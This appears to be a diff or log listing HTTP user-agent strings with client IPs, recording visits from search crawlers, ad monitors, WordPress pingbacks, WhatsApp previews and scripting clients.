    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.111]
    +okhttp/3.11.0 [ip:213.32.4.102]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Google (+https://developers.google.com/+/web/snippet/) [ip:74.125.214.18]
    +python-requests/2.18.4 [ip:213.32.4.95]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.150]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.202]
    +okhttp/3.12.5 [ip:120.21.161.138]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603533133-0
    +WordPress/5.4.1; http://cryptorigion.com
    +WhatsApp/2.20.203.5 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603570471-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603501240-0
    +CCBot/2.0 (https://commoncrawl.org/faq/) [ip:213.32.4.102]
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.0.2; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +WordPress/5.5.1; https://iapple-59.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603523033-0
    +WhatsApp/2.20.201.23 A,gzip(gfe)
    +CCBot/2.0 (https://commoncrawl.org/faq/) [ip:213.32.4.224]
    +Googlebot-Video/1.0 [ip:213.32.4.211]
    +Java/1.8.0_242 [ip:213.32.4.102]
    +okhttp/3.11.0 [ip:109.53.3.168]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.102]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:213.180.203.124]
    +Googlebot-Video/1.0 [ip:213.32.4.95]
    +Googlebot-Video/1.0 [ip:213.32.4.102]
    +okhttp/3.12.5 [ip:170.78.29.21]
    +Mozilla/5.0 (compatible; proximic; +https://www.comscore.com/Web-Crawler) [ip:34.202.9.50]
    +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2 [ip:69.195.137.50]
    +WordPress/5.5.1; http://exprtwriting.com; verifying pingback from 14.143.168.230
    +WordPress/5.5.1; http://blog.passionriver.com; verifying pingback from 50.62.35.16
    +WordPress/5.5.1; https://advanxer.com/blog; verifying pingback from 129.237.33.27
    +WordPress/5.5.1; https://kufukaa.com; verifying pingback from 91.207.238.107
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603628417-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603623603-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603624785-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603649432-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603627579-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603627579-60
    +WordPress/5.3.4; https://soft-for-pk.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603627578-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603627580-10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 5.1; itel_it1355 ) U2/1.0.0 Mobile
    +GuzzleHttp/6.5.5 curl/7.52.1 PHP/7.2.34-4+0~20201018.51+debian9~1.gbpc553f7
    +okhttp/3.11.0 [ip:37.163.63.82]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.94]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.16]
    +okhttp/3.12.5 [ip:78.98.201.145]
    +okhttp/3.12.5 [ip:5.11.121.56]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.93]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.81]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.225]
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.63
    +WordPress/5.4.2; http://videografproductions.net; verifying pingback from 192.109.165.90
    +WordPress.com; https://hotelworldconsulting.wordpress.com; verifying pingback from 110.77.248.159
    +Python/3.6 aiohttp/3.7.1
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603697526-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 8.0.0; Micromax_Q4101 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603736345-0
    +WhatsApp/2.20.111.3 i
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603674566-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603674567-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603711129-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603735203-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603711129-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603711130-10
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.27]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.175]
    +Python-urllib/2.7 [ip:213.32.4.102]
    +AvsDeviceSdk/1.11.0 [ip:213.32.4.245]
    +okhttp/3.12.5 [ip:46.114.145.200]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.17]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.165]
    +curl/7.51.0 [ip:213.32.4.211]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.66.66]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.66.64]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.231.3]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:213.180.203.181]
    +Googlebot-Video/1.0 [ip:66.249.66.64]
    +curl/7.61.1 [ip:34.211.91.72]
    +curl/7.61.1 [ip:54.160.62.252]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603758504-0
    +Crawler/0.0.1
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603814459-0
    +WordPress/5.5.1; http://www.letsscarejessicatodeath.net; verifying pingback from 117.242.154.73
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603830837-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603830787-10
    +WhatsApp/2.20.205.1 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603780557-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603786127-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603786139-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1603790920-0
    +Twitterbot/1.0 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.12.3 Chrome/69.0.3497.128 Safari/537.36
    +WhatsApp/2.20.202.18 A
    +Y!J-BRW/1.0 (https://www.yahoo-help.jp/app/answers/detail/p/595/a_id/42716)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603757167-0
    +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/86.0.4240.96 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603757167-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603757168-10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 7.1.2; GT-I9152 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.238]
    +okhttp/3.12.5 [ip:37.163.183.192]
    +okhttp/3.11.0 [ip:37.160.120.22]
    +okhttp/3.12.5 [ip:146.0.134.41]
    +okhttp/3.12.5 [ip:37.161.57.122]
    +okhttp/3.12.5 [ip:120.21.173.98]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Google (+https://developers.google.com/+/web/snippet/) [ip:74.125.214.22]
    +python-requests/2.18.4 [ip:213.32.4.115]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Google (+https://developers.google.com/+/web/snippet/) [ip:66.102.9.15]
    +okhttp/3.12.5 [ip:45.137.232.22]
    +okhttp/3.12.5 [ip:120.18.166.216]
    +curl/7.61.1 [ip:44.242.60.116]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603843967-0
    +WhatsApp/2.2043.15 N
    +WordPress/5.5.1; https://furkanege.com.tr/blog
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603903621-0
    +python-requests/2.7.0 CPython/2.7.18 Windows/10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.1.2; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile
    +WordPress/5.5; https://logicagironina.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603865952-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603865965-10
    +WhatsApp/2.20.205.2 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603881916-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603844574-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603881915-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603893463-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603905260-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603905268-0
    +WhatsApp/2.20.202.16 A
    +WordPress/5.4.2; https://it-informa.com
    +WordPress/5.5.1; https://hello-papaye.com
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.0.563 (SpeedMode; Proxy; Android 4.1.2; GT-S6790 ) U2/1.0.0 Mobile
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/W.X.Y.Z\xE2\x80\xA1 Safari/537.36
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.133]
    +curl/7.36.0 [ip:95.232.57.215]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.53]
    +okhttp/3.11.0 [ip:37.163.191.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.8]
    +DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1;  http://www.google.com/bot.html) [ip:213.32.4.95]
    +curl/7.36.0 [ip:93.44.90.16]
    +python-requests/2.21.0 [ip:213.32.4.95]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603930480-0
    +serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)
    +WhatsApp/2.20.205.5 A
    +WhatsApp/2.20.205.4 A
    +WordPress/5.5.1; http://momentum1st.com
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 4.4.2; SM-J701F ) U2/1.0.0 Mobile
    +Feedly/1.0 (+http://www.feedly.com/fetcher.html; 51 subscribers; like FeedFetcher-Google)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.0.2; SM-G600FY ) U2/1.0.0 Mobile
    +Apache-HttpClient/UNAVAILABLE (Java/1.8.0_265)
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.86]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603987843-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603976829-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1603931753-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603976817-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1603976844-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 9; SM-C111 ) U2/1.0.0 Mobile
    +okhttp/3.11.0 [ip:185.225.28.10]
    +okhttp/3.11.0 [ip:37.161.147.33]
    +okhttp/3.12.5 [ip:83.99.102.212]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.182]
    +okhttp/3.11.0 [ip:37.161.13.58]
    +python-requests/2.18.4 [ip:213.32.4.245]
    +okhttp/3.11.0 [ip:37.163.182.147]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.148]
    +okhttp/3.11.0 [ip:37.162.179.51]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.82]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.2]
    +curl/7.61.1 [ip:34.224.14.138]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.73]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.251]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/61.0.3163.100 Chrome/61.0.3163.100 Safari/537.36 PingdomPageSpeed/1.0 (pingbot/2.0; +http://www.pingdom.com/) [ip:52.29.177.64]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604027308-0
    +WordPress/5.5.2; https://bitlab.com.br/bitwiki
    +WhatsApp/2.2043.17 N
    +WhatsApp/2.2043.19 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604101784-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604083591-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604039512-10
    +WhatsApp/2.20.198.12 A
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 9; SM-A107F ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604020746-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604028099-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604028101-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604037085-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604039503-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604039501-0
    +okhttp/3.12.5 [ip:213.111.25.32]
    +WhatsApp/2.20.205.6 A
    +WordPress/5.5.2; https://blogchain.com.ua
    +WordPress/5.5.2; https://hello-papaye.com
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.14]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.72]
    +okhttp/3.11.0 [ip:37.162.150.188]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.107]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.63]
    +okhttp/3.11.0 [ip:37.162.153.74]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.52]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.201]
    +okhttp/3.12.11 [ip:172.58.187.182]
    +okhttp/3.11.0 [ip:185.186.104.245]
    +okhttp/3.11.0 [ip:37.163.36.152]
    +okhttp/3.11.0 [ip:37.163.43.248]
    +Googlebot-Video/1.0 [ip:66.249.64.154]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.98]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.63]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.208]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604120286-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604105869-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604135398-0
    +WhatsApp/2.20.205.7 A
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 8.1.0; AS-5433_Secret ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604174348-0
    +curl/7.36.0 [ip:87.4.243.118]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:74.125.216.44]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:74.125.216.46]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.74]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:74.125.216.46]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:74.125.216.48]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.209]
    +okhttp/3.11.0 [ip:37.162.77.254]
    +okhttp/3.12.5 [ip:151.36.124.247]
    +okhttp/3.12.5 [ip:151.44.71.194]
    +okhttp/3.12.5 [ip:5.88.205.241]
